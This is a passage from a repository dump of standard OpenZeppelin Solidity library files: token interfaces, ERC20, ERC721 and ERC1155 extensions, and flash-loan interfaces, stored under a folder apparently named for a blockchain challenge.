20 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC1363Receiver.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC1363Receiver.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | interface IERC1363Receiver { 7 | /* 8 | * Note: the ERC-165 identifier for this interface is 0x88a7ca5c. 9 | * 0x88a7ca5c === bytes4(keccak256("onTransferReceived(address,address,uint256,bytes)")) 10 | */ 11 | 12 | /** 13 | * @notice Handle the receipt of ERC1363 tokens 14 | * @dev Any ERC1363 smart contract calls this function on the recipient 15 | * after a `transfer` or a `transferFrom`. This function MAY throw to revert and reject the 16 | * transfer. Return of other than the magic value MUST result in the 17 | * transaction being reverted. 18 | * Note: the token contract address is always the message sender. 19 | * @param operator address The address which called `transferAndCall` or `transferFromAndCall` function 20 | * @param from address The address which are token transferred from 21 | * @param value uint256 The amount of tokens transferred 22 | * @param data bytes Additional data with no specified format 23 | * @return `bytes4(keccak256("onTransferReceived(address,address,uint256,bytes)"))` 24 | * unless throwing 25 | */ 26 | function onTransferReceived( 27 | address operator, 28 | address from, 29 | uint256 value, 30 | bytes memory data 31 | ) external returns (bytes4); 32 | } 33 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC1363Spender.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC1363Spender.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | interface IERC1363Spender { 7 | /* 8 | * Note: the ERC-165 identifier for this interface is 0x7b04a2d0. 9 | * 0x7b04a2d0 === bytes4(keccak256("onApprovalReceived(address,uint256,bytes)")) 10 | */ 11 | 12 | /** 13 | * @notice Handle the approval of ERC1363 tokens 14 | * @dev Any ERC1363 smart contract calls this function on the recipient 15 | * after an `approve`. This function MAY throw to revert and reject the 16 | * approval. Return of other than the magic value MUST result in the 17 | * transaction being reverted. 18 | * Note: the token contract address is always the message sender. 19 | * @param owner address The address which called `approveAndCall` function 20 | * @param value uint256 The amount of tokens to be spent 21 | * @param data bytes Additional data with no specified format 22 | * @return `bytes4(keccak256("onApprovalReceived(address,uint256,bytes)"))` 23 | * unless throwing 24 | */ 25 | function onApprovalReceived( 26 | address owner, 27 | uint256 value, 28 | bytes memory data 29 | ) external returns (bytes4); 30 | } 31 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC165.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC165.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../utils/introspection/IERC165.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC1820Implementer.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC1820Implementer.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../utils/introspection/IERC1820Implementer.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC1820Registry.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC1820Registry.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../utils/introspection/IERC1820Registry.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC20.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC20.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC20/IERC20.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC20Metadata.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC20Metadata.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC20/extensions/IERC20Metadata.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC2981.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.6.0) (interfaces/IERC2981.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../utils/introspection/IERC165.sol"; 7 | 8 | /** 9 | * @dev Interface for the NFT Royalty Standard. 10 | * 11 | * A standardized way to retrieve royalty payment information for non-fungible tokens (NFTs) to enable universal 12 | * support for royalty payments across all NFT marketplaces and ecosystem participants. 13 | * 14 | * _Available since v4.5._ 15 | */ 16 | interface IERC2981 is IERC165 { 17 | /** 18 | * @dev Returns how much royalty is owed and to whom, based on a sale price that may be denominated in any unit of 19 | * exchange. The royalty amount is denominated and should be paid in that same unit of exchange. 20 | */ 21 | function royaltyInfo(uint256 tokenId, uint256 salePrice) 22 | external 23 | view 24 | returns (address receiver, uint256 royaltyAmount); 25 | } 26 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC3156.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC3156.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "./IERC3156FlashBorrower.sol"; 7 | import "./IERC3156FlashLender.sol"; 8 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC3156FlashBorrower.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC3156FlashBorrower.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @dev Interface of the ERC3156 FlashBorrower, as defined in 8 | * https://eips.ethereum.org/EIPS/eip-3156[ERC-3156]. 9 | * 10 | * _Available since v4.1._ 11 | */ 12 | interface IERC3156FlashBorrower { 13 | /** 14 | * @dev Receive a flash loan. 15 | * @param initiator The initiator of the loan. 16 | * @param token The loan currency. 17 | * @param amount The amount of tokens lent. 18 | * @param fee The additional amount of tokens to repay. 19 | * @param data Arbitrary data structure, intended to contain user-defined parameters. 20 | * @return The keccak256 hash of "ERC3156FlashBorrower.onFlashLoan" 21 | */ 22 | function onFlashLoan( 23 | address initiator, 24 | address token, 25 | uint256 amount, 26 | uint256 fee, 27 | bytes calldata data 28 | ) external returns (bytes32); 29 | } 30 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC3156FlashLender.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC3156FlashLender.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "./IERC3156FlashBorrower.sol"; 7 | 8 | /** 9 | * @dev Interface of the ERC3156 FlashLender, as defined in 10 | * https://eips.ethereum.org/EIPS/eip-3156[ERC-3156]. 11 | * 12 | * _Available since v4.1._ 13 | */ 14 | interface IERC3156FlashLender { 15 | /** 16 | * @dev The amount of currency available to be lended. 17 | * @param token The loan currency. 18 | * @return The amount of `token` that can be borrowed. 19 | */ 20 | function maxFlashLoan(address token) external view returns (uint256); 21 | 22 | /** 23 | * @dev The fee to be charged for a given loan. 24 | * @param token The loan currency. 25 | * @param amount The amount of tokens lent. 26 | * @return The amount of `token` to be charged for the loan, on top of the returned principal. 27 | */ 28 | function flashFee(address token, uint256 amount) external view returns (uint256); 29 | 30 | /** 31 | * @dev Initiate a flash loan. 32 | * @param receiver The receiver of the tokens in the loan, and the receiver of the callback. 33 | * @param token The loan currency. 34 | * @param amount The amount of tokens lent. 35 | * @param data Arbitrary data structure, intended to contain user-defined parameters. 36 | */ 37 | function flashLoan( 38 | IERC3156FlashBorrower receiver, 39 | address token, 40 | uint256 amount, 41 | bytes calldata data 42 | ) external returns (bool); 43 | } 44 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC721.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC721.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC721/IERC721.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC721Enumerable.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC721Enumerable.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC721/extensions/IERC721Enumerable.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC721Metadata.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC721Metadata.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC721/extensions/IERC721Metadata.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC721Receiver.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC721Receiver.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC721/IERC721Receiver.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC777.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC777.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC777/IERC777.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC777Recipient.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC777Recipient.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC777/IERC777Recipient.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/IERC777Sender.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/IERC777Sender.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC777/IERC777Sender.sol"; 7 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/README.adoc: -------------------------------------------------------------------------------- 1 | = Interfaces 2 | 3 | [.readme-notice] 4 | NOTE: This document is better viewed at https://docs.openzeppelin.com/contracts/api/interfaces 5 | 6 | == List of standardized interfaces 7 | These interfaces are available as `.sol` files, and also as compiler `.json` ABI files (through the npm package). These 8 | are useful to interact with third party contracts that implement them. 9 | 10 | - {IERC20} 11 | - {IERC20Metadata} 12 | - {IERC165} 13 | - {IERC721} 14 | - {IERC721Receiver} 15 | - {IERC721Enumerable} 16 | - {IERC721Metadata} 17 | - {IERC777} 18 | - {IERC777Recipient} 19 | - {IERC777Sender} 20 | - {IERC1155} 21 | - {IERC1155Receiver} 22 | - {IERC1155MetadataURI} 23 | - {IERC1271} 24 | - {IERC1363} 25 | - {IERC1820Implementer} 26 | - {IERC1820Registry} 27 | - {IERC2612} 28 | - {IERC2981} 29 | - {IERC3156FlashLender} 30 | - {IERC3156FlashBorrower} 31 | 32 | == Detailed ABI 33 | 34 | {{IERC1271}} 35 | 36 | {{IERC1363}} 37 | 38 | {{IERC1363Receiver}} 39 | 40 | {{IERC1820Implementer}} 41 | 42 | {{IERC1820Registry}} 43 | 44 | {{IERC2612}} 45 | 46 | {{IERC2981}} 47 | 48 | {{IERC3156FlashLender}} 49 | 50 | {{IERC3156FlashBorrower}} 51 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/draft-IERC1822.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.5.0) (interfaces/draft-IERC1822.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @dev ERC1822: Universal Upgradeable Proxy Standard (UUPS) documents a method for upgradeability through a simplified 8 | * proxy whose upgrades are fully controlled by the current implementation. 9 | */ 10 | interface IERC1822Proxiable { 11 | /** 12 | * @dev Returns the storage slot that the proxiable contract assumes is being used to store the implementation 13 | * address. 14 | * 15 | * IMPORTANT: A proxy pointing at a proxiable contract should not be considered proxiable itself, because this risks 16 | * bricking a proxy that upgrades to it, by delegating to itself until out of gas. Thus it is critical that this 17 | * function revert if invoked through a proxy. 18 | */ 19 | function proxiableUUID() external view returns (bytes32); 20 | } 21 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/interfaces/draft-IERC2612.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (interfaces/draft-IERC2612.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../token/ERC20/extensions/draft-IERC20Permit.sol"; 7 | 8 | interface IERC2612 is IERC20Permit {} 9 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC1155/extensions/ERC1155Burnable.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC1155/extensions/ERC1155Burnable.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../ERC1155.sol"; 7 | 8 | /** 9 | * @dev Extension of {ERC1155} that allows token holders to destroy both their 10 | * own tokens and those that they have been approved to use. 11 | * 12 | * _Available since v3.1._ 13 | */ 14 | abstract contract ERC1155Burnable is ERC1155 { 15 | function burn( 16 | address account, 17 | uint256 id, 18 | uint256 value 19 | ) public virtual { 20 | require( 21 | account == _msgSender() || isApprovedForAll(account, _msgSender()), 22 | "ERC1155: caller is not owner nor approved" 23 | ); 24 | 25 | _burn(account, id, value); 26 | } 27 | 28 | function burnBatch( 29 | address account, 30 | uint256[] memory ids, 31 | uint256[] memory values 32 | ) public virtual { 33 | require( 34 | account == _msgSender() || isApprovedForAll(account, _msgSender()), 35 | "ERC1155: caller is not owner nor approved" 36 | ); 37 | 38 | _burnBatch(account, ids, values); 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC1155/extensions/ERC1155Pausable.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC1155/extensions/ERC1155Pausable.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../ERC1155.sol"; 7 | import "../../../security/Pausable.sol"; 8 | 9 | /** 10 | * @dev ERC1155 token with pausable token transfers, minting and burning. 11 | * 12 | * Useful for scenarios such as preventing trades until the end of an evaluation 13 | * period, or having an emergency switch for freezing all token transfers in the 14 | * event of a large bug. 15 | * 16 | * _Available since v3.1._ 17 | */ 18 | abstract contract ERC1155Pausable is ERC1155, Pausable { 19 | /** 20 | * @dev See {ERC1155-_beforeTokenTransfer}. 21 | * 22 | * Requirements: 23 | * 24 | * - the contract must not be paused. 25 | */ 26 | function _beforeTokenTransfer( 27 | address operator, 28 | address from, 29 | address to, 30 | uint256[] memory ids, 31 | uint256[] memory amounts, 32 | bytes memory data 33 | ) internal virtual override { 34 | super._beforeTokenTransfer(operator, from, to, ids, amounts, data); 35 | 36 | require(!paused(), "ERC1155Pausable: token transfer while paused"); 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC1155/extensions/IERC1155MetadataURI.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC1155/extensions/IERC1155MetadataURI.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../IERC1155.sol"; 7 | 8 | /** 9 | * @dev Interface of the optional ERC1155MetadataExtension interface, as defined 10 | * in the https://eips.ethereum.org/EIPS/eip-1155#metadata-extensions[EIP]. 11 | * 12 | * _Available since v3.1._ 13 | */ 14 | interface IERC1155MetadataURI is IERC1155 { 15 | /** 16 | * @dev Returns the URI for token type `id`. 17 | * 18 | * If the `\{id\}` substring is present in the URI, it must be replaced by 19 | * clients with the actual token type ID. 20 | */ 21 | function uri(uint256 id) external view returns (string memory); 22 | } 23 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC1155/presets/README.md: -------------------------------------------------------------------------------- 1 | Contract presets are now deprecated in favor of [Contracts Wizard](https://wizard.openzeppelin.com/) as a more powerful alternative. 2 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC1155/utils/ERC1155Holder.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC1155/utils/ERC1155Holder.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "./ERC1155Receiver.sol"; 7 | 8 | /** 9 | * Simple implementation of `ERC1155Receiver` that will allow a contract to hold ERC1155 tokens. 10 | * 11 | * IMPORTANT: When inheriting this contract, you must include a way to use the received tokens, otherwise they will be 12 | * stuck. 13 | * 14 | * @dev _Available since v3.1._ 15 | */ 16 | contract ERC1155Holder is ERC1155Receiver { 17 | function onERC1155Received( 18 | address, 19 | address, 20 | uint256, 21 | uint256, 22 | bytes memory 23 | ) public virtual override returns (bytes4) { 24 | return this.onERC1155Received.selector; 25 | } 26 | 27 | function onERC1155BatchReceived( 28 | address, 29 | address, 30 | uint256[] memory, 31 | uint256[] memory, 32 | bytes memory 33 | ) public virtual override returns (bytes4) { 34 | return this.onERC1155BatchReceived.selector; 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC1155/utils/ERC1155Receiver.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC1155/utils/ERC1155Receiver.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../IERC1155Receiver.sol"; 7 | import "../../../utils/introspection/ERC165.sol"; 8 | 9 | /** 10 | * @dev _Available since v3.1._ 11 | */ 12 | abstract contract ERC1155Receiver is ERC165, IERC1155Receiver { 13 | /** 14 | * @dev See {IERC165-supportsInterface}. 15 | */ 16 | function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) { 17 | return interfaceId == type(IERC1155Receiver).interfaceId || super.supportsInterface(interfaceId); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC20/extensions/ERC20Burnable.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC20/extensions/ERC20Burnable.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../ERC20.sol"; 7 | import "../../../utils/Context.sol"; 8 | 9 | /** 10 | * @dev Extension of {ERC20} that allows token holders to destroy both their own 11 | * tokens and those that they have an allowance for, in a way that can be 12 | * recognized off-chain (via event analysis). 13 | */ 14 | abstract contract ERC20Burnable is Context, ERC20 { 15 | /** 16 | * @dev Destroys `amount` tokens from the caller. 17 | * 18 | * See {ERC20-_burn}. 19 | */ 20 | function burn(uint256 amount) public virtual { 21 | _burn(_msgSender(), amount); 22 | } 23 | 24 | /** 25 | * @dev Destroys `amount` tokens from `account`, deducting from the caller's 26 | * allowance. 27 | * 28 | * See {ERC20-_burn} and {ERC20-allowance}. 29 | * 30 | * Requirements: 31 | * 32 | * - the caller must have allowance for ``accounts``'s tokens of at least 33 | * `amount`. 34 | */ 35 | function burnFrom(address account, uint256 amount) public virtual { 36 | _spendAllowance(account, _msgSender(), amount); 37 | _burn(account, amount); 38 | } 39 | } 40 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC20/extensions/ERC20Capped.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/ERC20Capped.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../ERC20.sol"; 7 | 8 | /** 9 | * @dev Extension of {ERC20} that adds a cap to the supply of tokens. 10 | */ 11 | abstract contract ERC20Capped is ERC20 { 12 | uint256 private immutable _cap; 13 | 14 | /** 15 | * @dev Sets the value of the `cap`. This value is immutable, it can only be 16 | * set once during construction. 17 | */ 18 | constructor(uint256 cap_) { 19 | require(cap_ > 0, "ERC20Capped: cap is 0"); 20 | _cap = cap_; 21 | } 22 | 23 | /** 24 | * @dev Returns the cap on the token's total supply. 25 | */ 26 | function cap() public view virtual returns (uint256) { 27 | return _cap; 28 | } 29 | 30 | /** 31 | * @dev See {ERC20-_mint}. 32 | */ 33 | function _mint(address account, uint256 amount) internal virtual override { 34 | require(ERC20.totalSupply() + amount <= cap(), "ERC20Capped: cap exceeded"); 35 | super._mint(account, amount); 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC20/extensions/ERC20Pausable.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/ERC20Pausable.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../ERC20.sol"; 7 | import "../../../security/Pausable.sol"; 8 | 9 | /** 10 | * @dev ERC20 token with pausable token transfers, minting and burning. 11 | * 12 | * Useful for scenarios such as preventing trades until the end of an evaluation 13 | * period, or having an emergency switch for freezing all token transfers in the 14 | * event of a large bug. 15 | */ 16 | abstract contract ERC20Pausable is ERC20, Pausable { 17 | /** 18 | * @dev See {ERC20-_beforeTokenTransfer}. 19 | * 20 | * Requirements: 21 | * 22 | * - the contract must not be paused. 23 | */ 24 | function _beforeTokenTransfer( 25 | address from, 26 | address to, 27 | uint256 amount 28 | ) internal virtual override { 29 | super._beforeTokenTransfer(from, to, amount); 30 | 31 | require(!paused(), "ERC20Pausable: token transfer while paused"); 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC20/extensions/IERC20Metadata.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../IERC20.sol"; 7 | 8 | /** 9 | * @dev Interface for the optional metadata functions from the ERC20 standard. 10 | * 11 | * _Available since v4.1._ 12 | */ 13 | interface IERC20Metadata is IERC20 { 14 | /** 15 | * @dev Returns the name of the token. 16 | */ 17 | function name() external view returns (string memory); 18 | 19 | /** 20 | * @dev Returns the symbol of the token. 21 | */ 22 | function symbol() external view returns (string memory); 23 | 24 | /** 25 | * @dev Returns the decimals places of the token. 26 | */ 27 | function decimals() external view returns (uint8); 28 | } 29 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC20/presets/ERC20PresetFixedSupply.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC20/presets/ERC20PresetFixedSupply.sol) 3 | pragma solidity ^0.8.0; 4 | 5 | import "../extensions/ERC20Burnable.sol"; 6 | 7 | /** 8 | * @dev {ERC20} token, including: 9 | * 10 | * - Preminted initial supply 11 | * - Ability for holders to burn (destroy) their tokens 12 | * - No access control mechanism (for minting/pausing) and hence no governance 13 | * 14 | * This contract uses {ERC20Burnable} to include burn capabilities - head to 15 | * its documentation for details. 16 | * 17 | * _Available since v3.4._ 18 | * 19 | * _Deprecated in favor of https://wizard.openzeppelin.com/[Contracts Wizard]._ 20 | */ 21 | contract ERC20PresetFixedSupply is ERC20Burnable { 22 | /** 23 | * @dev Mints `initialSupply` amount of token and transfers them to `owner`. 24 | * 25 | * See {ERC20-constructor}. 26 | */ 27 | constructor( 28 | string memory name, 29 | string memory symbol, 30 | uint256 initialSupply, 31 | address owner 32 | ) ERC20(name, symbol) { 33 | _mint(owner, initialSupply); 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC20/presets/README.md: -------------------------------------------------------------------------------- 1 | Contract presets are now deprecated in favor of [Contracts Wizard](https://wizard.openzeppelin.com/) as a more powerful alternative. 2 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC721/IERC721Receiver.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721Receiver.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | /** 7 | * @title ERC721 token receiver interface 8 | * @dev Interface for any contract that wants to support safeTransfers 9 | * from ERC721 asset contracts. 10 | */ 11 | interface IERC721Receiver { 12 | /** 13 | * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom} 14 | * by `operator` from `from`, this function is called. 15 | * 16 | * It must return its Solidity selector to confirm the token transfer. 17 | * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted. 18 | * 19 | * The selector can be obtained in Solidity with `IERC721Receiver.onERC721Received.selector`. 20 | */ 21 | function onERC721Received( 22 | address operator, 23 | address from, 24 | uint256 tokenId, 25 | bytes calldata data 26 | ) external returns (bytes4); 27 | } 28 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC721/extensions/ERC721Burnable.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/ERC721Burnable.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../ERC721.sol"; 7 | import "../../../utils/Context.sol"; 8 | 9 | /** 10 | * @title ERC721 Burnable Token 11 | * @dev ERC721 Token that can be irreversibly burned (destroyed). 12 | */ 13 | abstract contract ERC721Burnable is Context, ERC721 { 14 | /** 15 | * @dev Burns `tokenId`. See {ERC721-_burn}. 16 | * 17 | * Requirements: 18 | * 19 | * - The caller must own `tokenId` or be an approved operator. 20 | */ 21 | function burn(uint256 tokenId) public virtual { 22 | //solhint-disable-next-line max-line-length 23 | require(_isApprovedOrOwner(_msgSender(), tokenId), "ERC721Burnable: caller is not owner nor approved"); 24 | _burn(tokenId); 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC721/extensions/ERC721Pausable.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/ERC721Pausable.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../ERC721.sol"; 7 | import "../../../security/Pausable.sol"; 8 | 9 | /** 10 | * @dev ERC721 token with pausable token transfers, minting and burning. 11 | * 12 | * Useful for scenarios such as preventing trades until the end of an evaluation 13 | * period, or having an emergency switch for freezing all token transfers in the 14 | * event of a large bug. 15 | */ 16 | abstract contract ERC721Pausable is ERC721, Pausable { 17 | /** 18 | * @dev See {ERC721-_beforeTokenTransfer}. 19 | * 20 | * Requirements: 21 | * 22 | * - the contract must not be paused. 23 | */ 24 | function _beforeTokenTransfer( 25 | address from, 26 | address to, 27 | uint256 tokenId 28 | ) internal virtual override { 29 | super._beforeTokenTransfer(from, to, tokenId); 30 | 31 | require(!paused(), "ERC721Pausable: token transfer while paused"); 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC721/extensions/ERC721Royalty.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/ERC721Royalty.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../ERC721.sol"; 7 | import "../../common/ERC2981.sol"; 8 | import "../../../utils/introspection/ERC165.sol"; 9 | 10 | /** 11 | * @dev Extension of ERC721 with the ERC2981 NFT Royalty Standard, a standardized way to retrieve royalty payment 12 | * information. 13 | * 14 | * Royalty information can be specified globally for all token ids via {_setDefaultRoyalty}, and/or individually for 15 | * specific token ids via {_setTokenRoyalty}. The latter takes precedence over the first. 16 | * 17 | * IMPORTANT: ERC-2981 only specifies a way to signal royalty information and does not enforce its payment. See 18 | * https://eips.ethereum.org/EIPS/eip-2981#optional-royalty-payments[Rationale] in the EIP. Marketplaces are expected to 19 | * voluntarily pay royalties together with sales, but note that this standard is not yet widely supported. 20 | * 21 | * _Available since v4.5._ 22 | */ 23 | abstract contract ERC721Royalty is ERC2981, ERC721 { 24 | /** 25 | * @dev See {IERC165-supportsInterface}. 26 | */ 27 | function supportsInterface(bytes4 interfaceId) public view virtual override(ERC721, ERC2981) returns (bool) { 28 | return super.supportsInterface(interfaceId); 29 | } 30 | 31 | /** 32 | * @dev See {ERC721-_burn}. This override additionally clears the royalty information for the token. 33 | */ 34 | function _burn(uint256 tokenId) internal virtual override { 35 | super._burn(tokenId); 36 | _resetTokenRoyalty(tokenId); 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/token/ERC721/extensions/IERC721Enumerable.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol) 3 | 4 | pragma solidity ^0.8.0; 5 | 6 | import "../IERC721.sol"; 7 | 8 | /** 9 | * @title ERC-721 